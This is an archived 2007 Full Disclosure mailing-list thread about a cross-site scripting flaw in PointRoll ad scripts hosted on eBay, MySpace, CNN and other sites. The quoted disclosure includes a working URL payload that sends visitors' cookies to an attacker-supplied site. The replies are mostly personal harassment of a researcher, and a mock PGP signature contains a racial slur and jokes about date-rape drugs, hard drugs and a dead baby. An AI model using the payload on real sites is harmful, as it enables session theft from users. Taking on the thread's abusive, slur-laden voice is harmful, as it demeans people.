Full Disclosure mailing list archives
Re: XSS vulnerabilities on eBay, MySpace, CNN.com, etc
From: lulzlulzluzluz <hardened.php () gmail com>
Date: Sat, 20 Oct 2007 01:46:16 -0400
i hurd pdp likes animal porn, is this true? pdp can you give us a detailed write up of where you find your animal porn? along with xss 0dayz in every link? On 10/19/07, phioust <phioust () gmail com> wrote:
in order for this severe vulnerability to get the attention it deserves it should of first been given to pdp architect so that he could whore it up to the media and do many interviews and pdfs on it. http://www.theinquirer.net/gb/inquirer/news/2007/10/10/bt-home-hub-wide-open http://www.gnucitizen.org/about/pdp#comment-59109 http://securityreason.com/securityalert/3213 http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=22351&mode=thread&order=0&thold=0 pdp architect could of also given great technical insight into the vulnerability due to his years spend researching XSS. http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0091.html <- a very technical email by pdp Results *1* - *10* of about *59,000* for *pdp architect xss*. (*0.12*seconds) ^ a great way to make a security career if stack based overflows are too challenging for you On 10/18/07, jgffgjfgd rewrewrew <ctjsme () gmail com> wrote:A cross-site scripting vulnerability has been discovered on multiple websites which use ads provided by Pointroll. The following list is a subset of the websites which contain the vulnerability: http://www.cnn.com/pointroll/PointRollAds.htm http://www.myspace.com/pointroll/PointRollAds.htm http://www.friendster.com/pointroll/PointRollAds.htm http://archive.gamespy.com/pointroll/PointRollAds.htm http://www.monster.com/pointroll/PointRollAds.htm http://www.allmusic.com/pointroll/PointRollAds.htm http://www.pcworld.com/pointroll/PointRollAds.htm http://www.10best.com/pointroll/PointRollAds.htm http://www.askmen.com/pointroll/PointRollAds.htm http://pages.ebay.com/pointroll/PointRollAds.html The above pages include a script at pointroll.com which is the root of the vulnerability. The vulnerability arises from the use of location.search without sanitizing the query. The following is a proof of concept which works in Firefox. This should be placed onto the end of any of the above URLs, obviously. [URL] should be replaced by your website URL, such as http://www.foo.com/bar.php, and [LENGTH+1] should be the length of your website URL + 1. ?pub=[URL]?&redir=%27%3E%3Cscript%3Ewindow.location= location.search.substring(5,[LENGTH+1]).concat(document.cookie)%3C/script%3E&ad=g235e20051011164320 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 HACKERShack0d4yc4nh4pp3nTOanyONEfull-disclosureh4ckkfisaniggerEPICLULZ DVDMANlyk3zD1ck101010ri0nSNORTsCOKEmethSHOOTheroinNIGGERbabydrownedlol r00t@hardened-phpLOLOL:DLOLHATshifteeisafed+ROOFEYZ/GHBdaterapelulzzzz SEKURITYIZSERIOUSBUSINESS =EPICLULZ -----END PGP SIGNATURE-----
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- XSS vulnerabilities on eBay, MySpace, CNN.com, etc jgffgjfgd rewrewrew (Oct 19)
- Re: XSS vulnerabilities on eBay, MySpace, CNN.com, etc phioust (Oct 19)
- Re: XSS vulnerabilities on eBay, MySpace, CNN.com, etc lulzlulzluzluz (Oct 19)
- Re: XSS vulnerabilities on eBay, MySpace, CNN.com, etc phioust (Oct 19)